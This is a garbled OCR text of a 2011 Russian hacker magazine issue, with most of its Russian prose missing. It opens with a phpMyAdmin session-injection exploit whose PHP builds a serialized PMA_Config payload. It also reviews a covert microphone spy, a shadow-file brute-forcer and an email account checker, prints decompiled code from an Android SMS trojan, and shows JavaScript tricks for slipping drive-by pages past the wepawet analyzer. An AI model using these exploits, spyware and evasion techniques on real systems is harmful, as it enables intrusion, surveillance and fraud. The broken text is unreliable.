2. HTML- , , :
preg_match(
'@name="token" value="([a-f0-9]{32})"@is',$page,$to);
$token = $to[1];
3.
:
preg_match(
'@phpMyAdmin=([a-z0-9]{32,40});?@is',$page,$se);
$session = $se[1];
4.
.
while :
$sess_path = array(
'/tmp/',
'/var/tmp/',
'/var/lib/php/',
'/var/lib/php4/',
'/var/lib/php5/',
'/var/lib/php/session/',
'/var/lib/php4/session/',
'/var/lib/php5/session/',
...

:
X 09/152/ 2011
$inj = $sess_path[$o].'sess_'.$session;
$query = $pma.'?session_to_unset=123&token='.
$token.'&_SESSION[!bla]='.urlencode(
'|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.
strlen($inj).':"'.$inj.'";}}');
: $sess_path[$o] $sess_path
, $session ,
$pma , $token .
$query : ,
. , ,
.
PMA_Config.

PHP-.
:
&_SESSION[payload]=<?php phpinfo(); ?>
payload ,
RFI.

. , ,
, Mango,
: magic_quotes_gpc = off PHP <= 5.2.13 & PHP <=
5.3.2.
.
, -

. ,
-
(
PoC ).
,
:). z
067

(icq 884888, snipper.ru)

blackhat
X-TOOLS
: Decodeby.US
deZender Public
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Ps2Gamer & Cyko
: -
: *nix/win
: & Slyer
PHP
-
Zend,
ionCube. , !
Decodeby.US deZender Public PHP-,

decodeby.us.
, :
1. .
2.
01_Decode.
3. Decode_ALL_Files.bat.
4.
02_Decoded ( Log_Decoded.txt
).

:
ionCube PHP Loader v3.1
NuSphere PhpExpress v3.0
Zend Optimizer v3.3
decodeby.us,
.
: MicSpy By SLESH 1.0b

: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: SLESH

MicSpy++ Nightmare.
, ,
,
068
.

.
,

MicSpy By SLESH, MicSpy++. ,
, (,
, / ).
:
1. mp3, 24
, 32 /, .
2. MPEG LAYER-3.
3. ___--.mp3.
4.
WEB-. c 4545
(http://127.0.0.1:4545).

:
;
/ ;

;
;
.
,
,
,
, :
1. MicSpy.dpr (
).
2. API.pas , .
3. MicRec.pas .
-

.
-,

, , .
-
:
1.
(
).
2.

(WYSIWYG-, CMS,
..).
3. .
4. , .
5.

(, ).
6. -
-.
7. (
).

:
-;
;
X 09 /152/ 2011
;
;
.
, ./
run .
,
.
,
,
, .
.

,

.

, ,
,
.
.
./results, ./bases,
./data .
config.ini db. ,
, .
. -
.
,

hack4sec, hack4sec.
blogspot.com.
: Bash-Brutoforcer
:*nix
: Cyber-punk and Simo2553
md5
:

md5- /
etc/shadow.
-
X 09 /152/ 2011
.
!
bash- BashBrutoforcer,
.
, :
1. shadow-;
2. ;
3. .

,
Linux.
:
./md5brute.sh -w(ordlist)|-n(umbers)|
-i(nformation)|-b(ruteshadow)
hash|shadow
-w (X="/usr/share/dict/
words" )
-n
-b shadow

,
.

(bit.ly/qaNAkq).
.;
;
- ;
.
:
.
, (
).
, .
html .
, .

, - .

. ,
bit.ly/ncfPFh,
,
.
: IR-ID MAKER
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ParsProg Software
:
Mail.ru
: *nix/win
: Fepsis
Yahoo
Yahoo.
:
Mail.ru
Mail.Ru,
.
, (
:)
? ,

?

Mail.ru
Fepsis.
:
:
login@mail.ru:pass
login@list.ru:pass
login@bk.ru:pass
login@inbox.ru:pass

( );

;
;
;
Yahoo.
:
1. Yahoo ID
( ).
2. Password .
3. First name Last name
,
.
4. START,
CREATE.
5. . z
069
MALWARE

ANDROID-

(Trojan-SMS.AndroidOS.FakePlayer)
Android. apk-
.
Android
apk
(Android PacKage).
ZIP- . , ,
7-Zip` Player.apk (. 1).
, apk-
. META-INF res,
AndroidManifest.xml, classes.dex resources.arsc.
apk-.
.
070
Classes.dex
classes.dex apk-,
Dalvik Virtual Machine. , , Android
Java, .class,
dx,
.dex,
.
, ,
. classes.dex ,
.
X 09 /152/ 2011
, TrojanSMS.AndroidOS.
FakePlayer
Player.apk
Resources.arsc

xml-, . Hiew, (
:)) . APKTool (code.google.
com/p/android-apktool).
xml`
.
: public.xml strings.xml.
:
<?xml version="1.0" encoding="utf-8"?>
<resources>
<public type="drawable" name="icon"
id="0x7f020000" />
<public type="layout" name="main"
id="0x7f030000" />
<public type="string" name="app_name"
id="0x7f040000" />
</resources>
Public.xml ,
,
.
: Animation, Color State List, Drawable, Layout,
Menu, String, Style . drawable, layout
string. ,
,
,
. strings.xml
:
<resources>
<string name="app_name">AndroidApplication1
</string>
</resources>
public.xml app_
name string, strings.xml
AndroidApplication1.
app_name
,
. res, .
X 09 /152/ 2011
Manifest.xml

APKTool.
,
: (package), , (android:label),
,
(android:name), (android:icon)
.. :
<manifest package="org.me.androidapplication1"
xmlns:android="http://schemas.android.com/
apk/res/android">
<application android:icon="@drawable/icon">
<activity android:label="PornoPlayer"
android:name=".MoviePlayer">
<intent-fi lter>
<action android:name="android.
intent.action.MAIN" />
<category android:name="android.
intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
<uses-permission android:name="android.
permission.SEND_SMS" />
</manifest>
, , , . usespermission. ,
, SMS (android.
permission.SEND_SMS).
RES
res . : drawable
layout. ,
. ,
icon.png.
icon public.xml.

main.xml, :
<LinearLayout android:orientation="vertical"
android:layout_width="fill_parent"
INFO
info
Android
SDK
: developer.
android.com/index.
html.
071
MALWARE
, jar-
{
super.onCreate(bundle);
DataHelper datahelper = new DataHelper(this);
if(datahelper.canwe())
{
TextView textview = new TextView(this);
Random random = new Random();
textview.setText(
"\u041F\u043E\u0434\u043E\u0436"
"\u0434\u0438\u0442\u0435...");
setContentView(textview);
SmsManager smsmanager = SmsManager.getDefault();
StringBuilder stringbuilder = (new StringBuilder(
)).append("************");
int i = random.nextInt(0xf4240) + 0x186a0;
String s = stringbuilder.append(i).toString();
android.app.PendingIntent pendingintent = null;
android.app.PendingIntent pendingintent1 = null;
smsmanager.sendTextMessage("***", null, s,
pendingintent, pendingintent1);
manifest.mf,
META-INF
android:layout_height="fi ll_parent"
xmlns:android="http://schemas.android.com/apk/res/
android">" <TextView android:layout_width="fill_parent"
android:layout_height="wrap_content" android:t
ext="Hello Android from NetBeans" />
</LinearLayout>
,
(android:orientation
LinearLayout), TextView (Hello Android from
NetBeans) (android:layout_width android:layout_
height).
META-Inf
META-INF : , , dex- ..

classes.dex.
, .
dex2jar (code.google.
com/p/dex2jar). jar-,
. , dex2jar , , dedexer. ,
P- Dalvik.
dex2jar
jar-, . , (. 4).
class-
Java. Jad, .
Java, .
.
: R.jad, R$attr.jad, R$drawable.jad, R$layout.jad
R$string.jad. . ,
,
MoviePlayer. ,
( ):
public class MoviePlayer extends Activity
{
public MoviePlayer()
{
}
public void onCreate(Bundle bundle)
072
...
}
finish();
}
}
DataHelper DataHelper.jad DataHelper$OpenHelper.jad.

,
(if datahelper.canwe()). .
, , SQLite- dwap.db.
table1
was, . .

textview.setText. -, -
.
(random.nextInt) (smsmanager.
sendTextMessage). .
,
.
,
-.
-,
:), ,
, ,
. -, . z
X 09 /152/ 2011
MALWARE
Korse
(andrepetukhov.wordpress.com)
DRIVE-BYDOWNLOAD
-

wepawet

Drive-by-Download.
,
,

(, flashplayer, pdfviewer, ActiveX ..).

. ,
- ,
. . ,
: ,
, . - . , ,
- HTML+JS+CSS,
:
, ,
.

wepawet (wepawet.cs.ucsb.edu/),
X 09 /152/ 2011
100%.
,
IP-. , ,
. , IP- ,
.
,
- .
IP-
(https://check.torproject.org/cgi-bin/TorBulkExitList.
py) . IP- ,
,
(
073
MALWARE
AJAX- onscroll
Firefox 4.0
alert(1)
LastModified-
, , ,
).

referrer. ,
, referrer
facebook.
Fingerprinting
, IP- . .
-, security- , IP- , . -, OpenVPN, -,
,
,
(, ). ,
(. HtmlUnit), ,
.

.
.
CAPTCH
, ( onmousemove ,
). ,
.
web
.
: HTML5, JavaScript, CSS .. , :
1. User-agent
JavaScript.
2. HTML5.
3. HTML + events.
4. .
.
1. User-agent JavaScript
user-agent,
,
074
. ,
. .

JS.
2. HTML5
: HTML5.
(, caniuse.com, browserscope.org).
.
, ,
:
Firefox 4.0
<svg xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg" viewBox="0 0 200 100"
width="0px" height="0px" id="inlineSVG">
</svg>
<script type="text/javascript">
var isFF = !!(1*({toString:0,valueOf:function(x){
return !!x;}}));
var inlineSVG = document.getElementById("inlineSVG");
var isFF4 = isFF && (inlineSVG != null);
</script>
3. HTML +
JS HTML5
JS. , , XSS. XSS
( html5sec.org),
JS, onfocus, onblur, onscroll. , XSS,
? : !
, , ( , , HTMLUnit,
),
. onscroll
html5sec. AJAX-
.
<body onscroll=makeAJAXrequest(1,eval)>
<br><br><br><br><br>
X 09 /152/ 2011
<p>- Xpath
Wepawet
<input autofocus />
</body>
/* makeAJAXrequest(param, callback)
*/
4.

, , : flash, pdf,
java, ActiveX, etc. ,
. , ,
: panopticlick.eff.org.
.
,

, .
, . JavaScript ,
jjencode (utf-8.jp/public/jjencode.html).
,
, .
, .
, , ,
. ,
HTTP, , . :
LastModified-
var dt = new Date(document.lastModified);
var str = "di`wq-4,>"; //XORed "alert(1);" with key 5;
var key = dt.getHours() % 8;
var result ="";
for(i=0;i<str.length;++i)
{
result +=String.fromCharCode(key^str.charCodeAt(i));
}
eval(result);
</script>
, ,

.
:
1. .
X 09 /152/ 2011
JavaScript jjencode
:
var func = eval;
func("alert(1)");
2. Xpath JavaScript.
:
<p>- Xpath
var paragraphs = document.evaluate("//p",
document, null,
XPathResult.ANY_TYPE, null
);
</script>
3. HTML5 , .
, , SELECT, , eval.
, , ,
SQL. , Ecmascript for XML, XML:
alert(1)
openDatabase('',1,1,0).transaction(function($){
$.executeSql('SELECT "al" || "er" || "t(1)"', [],
function($,results){
for(i in results.rows.item(0))
eval(results.rows.item(0)[i])
})
})
</script>

. -
. , , ,
wepawet ,
. z
075

I ncognitus (mifrill@real.xakep.ru)
Crutop, RX-Promotion, Fethard Chronopay
076
X 09 /152/ 2011
HTTP://WWW
links
http://bit.ly/iXANMF

.
http://bit.ly/e1x29l
Chronopay

.
http://bit.ly/n9MfMy

RedEye.
http://wapo.st/2oV3Ye
Washington
Post.
http://sporaw.
livejournal.com/89032.
html .
RedEye - ,
. -, , Fethard, 19 . ,
!

RedEye 1999 .
,
( )
.
Pornocruto.nu.
,
: rape zoo.
. ( Ibill.com). .
X 09 /152/ 2011

news-.

,
.

,
, , . RedEye
,
- ,

. ,
.
.
- Crutop.nu.
, , .
2005
.

Master-x.com .

(
).
077

:
, ,

.
:
,
Pornocruto.nu,
50%- .
2000
.
:
- , , 95% .
, ,

- . RedEye
Rape.
cash.pornocruto.
nu .
Pornocruto Cash
2000 2002 Pornocruto Cash (PC).

9 ,
. ,
80/20: 80% 20% .
Scream and Cream (www.
screamandcream.com).
2000 ,
RedEye , :

.
www.badtales.com www.violentcomix.
com
,
BDSM-
Gary Roberts.
bit.ly/pZLnJS.

, .
, ,
. ,
,

? , !

Ibill.com. 35-40
.
2001-2002
( 200
).
,
,
, Crutop, RedEye
,
Pornocruto Cash .
Pornocruto Cash
170 200 .
( 2001-2002 !). ,

, .
Pornocruto Cash
Pornocruto Cash
2002 , Ibill .
, Pornocruto Cash.
-
, .
:
1999
2000
pornocruto.nu : zoo- rape-.

,
: Forbes
,
. Ibill.com.

, .
RedEye
,

.
-. 2005 -.
Pornocruto.nu
078
Crutop.nu
X 09 /152/ 2011
RedEye RedEye,
.
:
, !

2002 c Desp (
),

, .

CHRONOPAY B.V., .
?
. ,
(Ronnie Beernaert),
Pornocruto Cash, RedEye
CHRONOPAY B.V.
,
: ,

.
, rape

fantasy domination BDSM. Pornocruto Cash
2009 .
,
, .
, , Fethard
RedEye, , ,
, ,
RedEye ,

-.
2003 RedEye
Fethard.biz. , Crutop.nu, ,
Fethard , , .
, 2007
RedEye adult ,

.
Fethard.biz
.
,
, Fethard , .
Fethard
: Yambo ( Y
, ),
CapitalCollect, Ecuator.biz,
.
, ,
2003-2007
Fethard.biz.
2007 Fethard.biz .
Fethard 2008
Fethard .
RedEye.
.
,
100%- -
. Fethard.biz :
1.
;
2.
.
, 12 2007
Fethard.biz Crutop.nu
.
3295 440 000
:
Crutop.nu. , 12 2007
Fethard.
biz.
. ,
. RedEye - .
,
- .
Fethard?

: ,
Fethard,

( -
2001
2002
2003
Cash.Pornocruto.nu
.
9 -,
,
.
Scream and Cream (www.
screamandcream.com).
Pornocruto Cash $170200k ,
Ibill.com.
2002 Ibill
, , :
rape- .
CHRONOPAY
B.V.,
(Ronnie Beernaert),
Pornocruto Cash. 9

Chronopay.
Fethard -,

.
cash out-:

.
Crutop.nu,
.
Fethard
Fethard -,

.
Fethard Finance ,
-
.
Fethard.biz 2002 RedEye
Crutop.nu.

Crutop.nu
Fethard , ,
Pornocruto Cash
X 09 /152/ 2011
Fethard
CHRONOPAY B.V.
Fethard
079
Chronopay
), ,
,

-,

, PIN- () .
,
,
Fethard .

-, ,
.

. RedEye $6 000 000.
(
2007 ), -
,

.
RedEyea, , ,
.

.
, 12 2008
.
,
.
:).
, .
,
30 www.redeyeblog.com, ,
, RedEye,
.

, , 76
bit.ly/eu0OHE.
.
chronopay.com
Google Analytics.
, ,
ID , RedEye: cash.
pornocruto.es etu-cash.com.
2004-2006
2007
2008

. Fethard 200% ,
Chronopay
high risk- , spyware,
. 2006
Fethard.biz
.
12 2007 Fethard.
biz,
. 1-2 1-2
4 .
RedEye,
PIN
. ,
6 .
RedEye : , 12 2008 ,
.
,
.
Fethard 19 .
080
=
RedEye?
Fethard
X 09 /152/ 2011

crutop.nu
Pornocruto Cash
Chronopay
Fethard
- Rx-Promotion
,
.
DDoS-
( Chronopay)
Engel,
.
,
, , . RedEye
, . (
-
), .
.
, .
:
,
.

(!) , , ,
.

, ,
Mac- Mac Defender, DDoS-
,

RX-Promotion . , DDoS ! z
2009
2010
2011

(,
..)
.
: , , .
:

Harley Davidson.
: , 25-26
2010
,
2009-2010 ,
cvv-.
, - NS- .

, (!)
.
DDoS- (
Chronopay)
. 25 RedEye

, .
Welcome to Russia!
-
( )
.
Chronopay

(www.chronopay.ru),
CHRONOPAY B.V. .
:

,

, .
,

,
Rx-Promotion
X 09 /152/ 2011
high risk-
:
, spyware, , ..
www.redeye-blog.com:
,
. , ,
, ,
.
chronopay.com
081
Mifrill , (mifrill@real.xakep.ru)
LulzSec

. Lulz Security : , ,
IT-. ,
, for lulz, . .

2011
,
, ,
+ .
,
,
.
,
, , , ,
, , .
, ,
082
. , ...
- Lulz Security,
,
. , , , .
Lulz Security
( LulzSec Lulz Boat )
. ,
, .
X-Factor ,
, American Idol Britains Got Talent.

X 09 /152/ 2011
250 ,
12 . , , , email .
LulzSec (lulzsecurity.com)
Releases, ,
.
SQL, txt, .
, ,
, .
:
LulzSec, , ,
: .
, , ,

, .

: twitter.com/LulzSec.

, ,
.
LulzSec ,
Fox.
Fox Broadcasting. ,
, -
!
.
,

LulzSec. Fox,
(, , Firefly?)
Fox .
AntiSec, LulzSec
X 09 /152/ 2011
083
. PBS
,
Lulz Boat ,
. .
Sony ,
, . LulzSec
. SonyMisic.
co.jp SQL, ,
, ,
. LulzSec : 1337 h4x0r,
- Sony.
8? 7 ?!.
, , (
Sony, ).
, Lulz Security WikiLeaks
-
, , .
-
gray hat (
) , . , LulzSec,
.
- .
Lulz Boat

. 0day- MoveableType,
084
Havij 1.14 Pro ( SQL-), (PBS).

. PBS NewsHour
, 15

. PBS
Twitter
, .
, ,
0day-, , LulzSec php ftp, ,
27 2.4.21-37.ELsmp 2005 i686.
, , .
All your base are
belong to LulzSec ( LulzSec), , , SQL .
, PBS.
, ,
- , MySQL- .
, , ,
. LulzSec :
PBS Wikileaks,
. Frontline:
Wikisecrets PBS . ,
,
. , , .
X 09 /152/ 2011

:
. WikiSecrets,
- .
PBS, ... .
,
( !)
. , , :
!
, ,
PBS. PBS ,
.

LulzSec , LulzSec .
: .
, ,
. , ,
.
, , .
, Sony ,
LulzSec , .
, , Sony
Playstation Network.
,
?,
. ,
, .
. LulzSec:
SonyPictures.com SQL, , .

!.. .
, , email-, ,
, , . , Sony Pictures ( ),
75 000 3,5 .
, LulzSec
.
- , , ,
.
Sony
IT , LulzSec
.
,
. LulzSec , ,
( ), ,
.
InfraGard.
, ,
, .
, .
infragardatlanta.org LulzSec 180 ,
X 09 /152/ 2011
LulzSec
(,
:)
085
? Lulz
Security.
Fuck FBI Friday.
, ,
, LulzSec Nintendo.
(
).
, LulzSec
,
lulzsecurity.com nintendo.com.

Sony, Sony Computer Entertainment
Developer Network.
, ,
.
. AntiSec
, ASCII
Chinga la migra
. , ,
( Unveillance,
)
Infragard .
LulzSec ,
, Unveillance .
, , .
,
LulzSec
Unveillance . .
, LulzSec ,
, -
086

, 13-
.
:
, . .
, ,
.
,
.
Senate.gov. ,
? - ?.
Reuters, ,

,
.

.
Lulz Boat Pron.com, 26 000 ,
. Facebook
.
, ,
, email-
, . ,
, 26 ,
.
LulzSec 55 .

Bethesda Softworks
ZeniMax Media .
,
, ,
: . , : LulzSec email-,
, BRINK,
. ,
,
200 000 BRINK Quake 4.
LulzSec , ,
Bethesda. - , .
, -
, , .
X 09 /152/ 2011
LulzSec,
... , , EVE Online, Escapist
Magazine, Minecraft League of Legends. LulzSec
, :
, .
, , , .

, .

. 4chan /b/
, LulzSec,
, , , . ,
. - ,
, ! .
, LulzSec, ,
. , , ,
LulzSec , AntiSec.
AntiSec, , .
LulzSec
. cia.gov ,
. LulzSec : cia.gov .
AntiSec. , 90- .
,
. AntiSec,
, , ,
,
.
LulzSec
. ,
DDoS, - .
Lulz Security :
t.co/JhcjgO9 #AntiSec,
.
,
presidencia.gov.br, brasil.
gov.br .
Twitter, , , , ,
.
, DDoS.

.
SB1070, ,
LulzSec ,
.
Chinga la migra,
. LulzSec email-, . , .
, LulzSec ,
,
.
20- , ,
X 09 /152/ 2011
( )
LulzSec. , 19 . , LulzSec :
, LulzSec , ... ... , , !
?.
, 26- , -
.
50- , : !.
, , , , , , ,
, , . ,
, - - , , .
LulzSec ,
, . , ,
LulzSec AntiSec,
, , ,
.
LulzSec . :
AOLinternal data.txt
AT&T internal data.rar
Battlefield Heroes Beta (550k users).csv
FBI being silly.txt
Hackforums.net (200k users).sql
Nato-bookshop.org (12k users).csv
Office networks of corporations.txt
Private Investigator Emails.txt
Random gaming forums (50k users).txt
Silly routers.txt
navy.mil owned.png
LulzSec (@
AnonymousIRC) : @LulzSec
. ? .
, , ?
, ,
,
.
. The Guardian IRC- #pure-elite,
. Lulz
Security , ,
, LulzSec,
. , joepie91, Neuron, Storm, trollpoll voodoo
Lulz Boat, ,
, .

? . ,

The Sun. News
Corporation. , News Corporation News International
The Times. , LulzSec
.
,
. z
087
PWNIE
AWARDS
2011

:
?

The Pwnie Awards.

, .
. .
. ?
, pwn\own
(, , ) pony (,
, ). The Tony Awards
, , , . , , . ,
.
.
Black Hat, .
088
01

.
,
.
Padding Oracle
ASP.NET (CVE-2010-3332)
(Juliano Rizzo), (Thai Duong)
, ASP.NET
Padding Oracle,
ASP.NET
web-,
.

Microsoft FTP (CVE-2010-3972)
(Matt Bergin)
, ftp- Microsoft.
- Telnet IAC ( , 0xFF).
:
, FTP-
.
(Chris Valasek) (Ryan
Smith), EIP
, ftp-.

ISC dhclient (CVE-2011-0997)
(Sebastian Krahmer)
(Marius Tomaschewski)
ISC dhclient DHCP-.
,
. ,
DHCP-
.
IPComp
BSD- (CVE-2011-1547)
(Tavis Ormandy)
BSD-
IPComp,
IPSec. IPComp , ( ). ,
.

Exim (CVE-2010-4344)

Exim
, .
. , EIP, shell-,
.
X 09 /152/ 2011
02 03
,
. ,
.
FreeType iOS (CVE-2011-0226)|

Comex|
Comex Type
1 FreeType,
Safari. ROP-, Comex ASLR iOS
. Comex
jailbreakme.com iOS .
Google Chrome
VUPEN
security- VUPEN
Google Chrome, Google

. , security-
Google , VUPEN -
Flash. , Flash ( Chrome )
, HTML. VUPEN , , ,
.

Java (CVE-2010-4452)
(Frederic Hoguin)
, Java .
- .
JRE 100% .
Blackberry Pwn2Own
(Vincenzo Iozzo), (Willem
Pinckaers), - (Ralf-Phillipp Weinmann)
WebKit ,
BlackBerry.
, , , -
RIM.
, .
,
.
, .
CSRSS (CVE-2011-1281)
j00ru (Matthew j00ru Jurczyk)
Windows CSRSS,
:

, ,
SYSTEM (utilman.exe) .

set_fs (CVE-2010-4258)
(Nelson Elhage)
Linux,
CLONE_CHILD_CLEARTID
set_fs function ,
,
DoS. PoC
.

Linux $ORIGIN (CVE-2010-3847)
(Tavis Ormandy)
, glibc $ORIGIN
LD_AUDIT,
setuid
. root.
win32k user-mode
callback Windows (MS11-034)
(Tarjei Mandt)
, 40
Windows. Infiltrate 2011, .
XSS Android
(Jon Oberheide)
XSS- Android, ,
.
X 09 /152/ 2011
089
04 05
, ,
,
email-.
Stackjacking
(Jon Oberheide),
(Dan Rosenberg)

Linux Grsec-
spender
PaX Team. ,
,
.

Flash ActionScript
(Haifei Li)
JIT Flash ActionScript
, Windows 7, ASLR DEP.
Adobe Shockwave
(Aaron Portnoy), (Logan Brown)

SmartHeap Adobe Shockwave.

.
|
Static Binary Rewriting|
, .

OpenSSH Novell NetWare
: Novell
ZDI advisory , , Novell , DoS
, ZDI
. 0x41414141 .
Magix Music Maker 16

: Magix
CORELAN Music Maker 16,
, PoC-.
, .
RSA SecurID
: RSA
, SecurID .
RSA?
, . ,
. ,
RSA Lockheed-Martin.
(Piotr Bania)|
- pax-future.txt,

Windows, [ !]
,
Windows.
LFH-
(Chris Valasek)

Low Fragmentation Heap Windows 7 Vista. !
090
X 09 /152/ 2011
06 07
Epic 0wnage
110%,
.
, ?
, (-) epic fail.

Sony
:
Epic 0wnage ,
,
. , ,
oww ( 0wnage) .
Sony|
CMS,

Google Apps, , , . .
, HBGary Federal , 1,21 -oww.
Fail0verflow GeoHot ,
PS3, Sony .
, , ,
, .
Sony GeoHot , .
, ,
MiniDisc.
Sony|
, . ,
Sony Sony Online
Entertainment (SOE). 25
SOE ( 77 )
.
, : FAIL.
Sony|
- Sony
. , , Sony?
LulzSec, , , Sony
FAIL.
Sony|
Sony , PlayStation
Network , .
PSN , .
, ,
8- ,
. , Sony.
Sony|
?
, ! , Sony
,
. , .
X 09 /152/ 2011
HBGarry Federal
LulzSec ,
LulzSec . Fox
News, PBS, Nintendo, pron.com, NHS, Infraguard, ,
Bethesda, Minecraft, League of Legends, The Escapist, EVE
online, , The Times The Sun.

.
(Bradley Manning) Wikileaks

Wikileaks ,
.
CD .
Stuxnet
? ?
0day- , , ?
.
08
? ,
( ),
.
Pwnie HD Halvar
. , , .

. Geohot
Sony . ,
, . z
091
UNIXOID
(execbit.ru)
Android-

Linux,
, Android
. , ,
,
, ,
, .

, , Android
,
.
,

. , Android : ,
SD- ( -
092
-) .
, .
, , .
- ,
, , ,
micro-USB-.
Wi-Fi
3G-, Android ( $100 ).
Android ,
.
X 09 /152/ 2011
FTPServer
INFO
ADB
WebSharing
, FTPServer.
FTPServer FTP- ,
SD-. : , ,
User (FTP-), Pass (
), Port ( 1024, , 1234), Default dir
( , /sdcard /mnt/
sdcard), Any Network
Save and Restart Service.
, IP- FTP-.
FTP-, , /
usr/bin/ftp mc. ,
,
.
FTP-, ,
.
SFTP, SSH- Android
( , ),
- WebSharing.
WebSharingLite
HTTP-, NextApp.

,
, (
Wi-Fi,
).
,
, ,
(, ,
).
. Start . IP- ,
,
. WebSharing
Wi-Fi,
(Menu Settings Network Settings Cellular
access).
.
X 09 /152/ 2011
Android
ADB (Android Debug Bridge).

,
Android SDK (
xda-developers.com).
ADB ,
,
, shell-,
, ,
.
info
Android
Dropbox-,

.

ADB
,

Android.
ADB

,
.

,

QR-
Barcode Scanner.
093
UNIXOID
ADB ,
(
USB).
micro-USB- ADB :
$ ./adb devices
016804110602C024
SSH-
device
, , , ,
.
adb shell, shell-
, ( ) Linux.
POSIX- id, ls, ps ..
, , , , /bin/
su, root ( , /
SD-).
root-,
busybox, ,
. ,
SuperOneClick (shortfuse.org,
Linux mono SuperOneClick.exe).
ADB, .
,
. :
$ for apk in *.apk; do ./adb install $apk; done
ADB :
$ ./adb push __ ///
:
$ ./adb pull /////
,
,
.
adb sync,
:
$ ./adb sync ///////
/
, / ( ).
ADB
( ):
$ ./adb reboot-bootloader
FTP Server
094
ADB ,
,
,
. , Android
ADB .
, Wi-Fi-, , Debug
over USB only ( Debug over
X 09 /152/ 2011
Open Source), ,
,
SSH- Android,
. :
1. , xda-developers.com,
SuperOneClick z4root (goo.gl/Bv7tx,
Android).
2. BusyBox (,
BusyBox Installer). , root
SuperOneClick.
3. Dropbear:
$ wget http://jhulst.com/dropbear.tar.gz
$ tar -xzf dropbear.tar.gz
$ ./adb push ~/dropbear /sdcard
$ ./adb shell
> su
> mount -o remount,rw /system
> cp /sdcard/dropbear/* /system/xbin
> chmod +x /system/xbin/dropbear /system/xbin/
dropbearkey
> mkdir /data/dropbear
> dropbearkey -t rsa -f /data/dropbear/dropbear_
rsa_host_key
> dropbearkey -t dss -f /data/dropbear/dropbear_
dss_host_key
DroidSSHd
ConnectBot
Lazier Geek
ConnectBot
USB only). ADB 5555 ( IP- : Wi-Fi
IP-).
ADB :
$ ./adb connect IP-
:
$ ./adb devices
192.168.0.100:5555
device
,
, shell.
SSH-.
SSH
, Java-
, Android
Linux-,
,
POSIX. ,
Linux-, SSH-,
Dropbear.

SSH-, SD-
SFTP,
Linux.
Dropbear
Android, SSHDroid Android Market .
(Dropbear -
X 09 /152/ 2011
, Dropbear ,
SSHDroid.
DroidSSHd (code.google.com/p/droidsshd/)
Dropbear , CyanogenMod 7.1. DroidSSHd
SSH- ,
, ,
( , )
.

,
, Service and Authentification.
(
password), ( SD), (TCP port to
listen, 2222)
(Start on boot).
,
( ),

System settings Run daemon as root.
,
Start. IP-, .
SSH-,
, ssh:
$ ssh android@192.168.0.100:2222
( )
Android .
095
UNIXOID
SSHmote
Transdroid
VLC Remote
Android VNC
Viewer
droid VNC Server
WebSharing

096
SSH-, ( ) ConnectBot. SSH-

, SSH .
,
, (Apache
License 2.0, ),
( )
SSH.
,
, . ConnectBot
, ,
.
. -,
/
(, px
ping xakep.ru), -
Android Lazier Geek. Lazier Geek

.
, ,
,
.
, Lazier Geek,
: Name
, Host
IP, User Pass.
, ,
. Save
,
. .

. ,
,
.
Windows, ,
Linux, Java, . ,
- .
, ,
SSHmote. mplayer, VLC, Amarok,
Kaffein ,
SSH, ,
, ,
SSH-.
SSHmote . SSH-,
(
)
(, Home mplayer).
,
,
. ,
,
/, , ..
SSHmote
, : SSH- ,
,
screen , ,
. , VLC,
VLC- VLC-Remote (
,
,
Peter Baldwin).
VLC Remote ,
, , VLC HTTP-.
:
$ vlc --extraintf=luahttp --fullscreen \
--http-album-art --qt-start-minimized
, VLC , IP
:
$ su -s
# echo 123.456.789.012 >> /usr/share/vlc/lua/
http/.hosts
0.0.0.0/0
IP-,
.
, (, ),
Add VLC server IP- . (
), .. , , Amarok2 Remote, Banshee Remote
mythdroid MythTV. .
Torrent- Transdroid.
,
, (QR- ). Transdroid Torrent-
Linux, .
,
Transmission.
Transmission .

Web.
web-.
, .
Transdroid, ,
,
, (Transmission), IP, 9091, , , ,
.
,
. ,
- , VNC ( ). VNC-
, ,
Android Linux. Android, Android VNC Viewer,
X 09 /152/ 2011
000000
SSHmote ,
VLC Remote
.
, :
1. VNC-:
$ sudo apt-get install tightvnc
2. ~/.vnc/xstartup
, :
$ vi ~/.vnc/xstartup
xrdb $HOME/.Xresources
startfluxbox &
(, startkde).
3. vncserver,
n
.
4. Android VNC Viewer, Password
( ), Address (IP- ), Port (
5901 5900) 24-bit
color Color Format, . Connect

.
,
.
VNC- droid
VNC server, Start
Server. vncviewer:
VNC-? !
,

Android. , .
: Wifi keyboard, ;
Chrome to Phone Google
Chrome ; IP
Webcam, web-; Remote
Web Desktop, ; NagMonDroid, Nagios; Zabbix
on the go Zabbix-. z
$ vncviewer IP-:5901
,
5801.
X 09 /152/ 2011
097
UNIXOID
Adept (adeptg@gmail.com)
38
,
: SiSoft Sandra,
3DMark, PCMark . nix ,
, .
CPU
, CPU.
.
Super Pi. Linux,
( 64- ).
Linux Pi. :
# apt-get install pi
, Pi
.
:
$ time pi 1048576 >/dev/null | grep real
, Pi 1048576 . Intel Core i5-2410M

0m1.675s, Intel Core i5-2300 0m0.137s.
, ,
, . ,
Pi ( Super Pi) .
. 7-zip
CPU ( / ,
, ). :
$ 7z b
, . ,
: / KB/s,
( )
MIPS ( ).
098
MIPS ( Linux
Tot).
Intel Core i5-2410M : 344, 2065, 7064. c ( ),
, MIPS, ,
(
).
Intel Core i5-2300 (): 357, 3049,
10771.

sysbench CPU. .
$ sysbench --test=cpu --cpu-max-prime=20000 run
, :
. Core i5-2410M
30,9614, Core i5-2300 27,8938.
GUI , hardinfo.
.
CPU . .
, .
, , ,
. , Linux mbw (Memory
BandWidth).
. :
,
. ( 10),
X 09 /152/ 2011
, benchmark GUI

openbenchmarking.org.
28 2011 Southern California Linux Expo. :
41258 ;
89,217 PTS (
openbenchmarking.org);
32189 PCI- 16536 USB;
325351 .
CPU 7-zip
.
:
execution time (avg): 32.6897
:
execution time (avg): 29.8387
sysbench ,
CPU. . :
$ sysbench --test=memory --memory-oper=read run
20,0857 19,5404 .
Ubuntu
CPU Intel
GPU Nvidia
Asus
HDD Samsung
FS ext4
. , :
$ mbw 512 | grep AVG
512 . ,
.

mbw-,
(, ).
:
AVG Method: MEMCPY Copy: 2765.609 MiB/s
AVG Method: DUMB Copy: 4248.589 MiB/s
AVG Method: MCBLOCK Copy: 11930.338 MiB/s
:
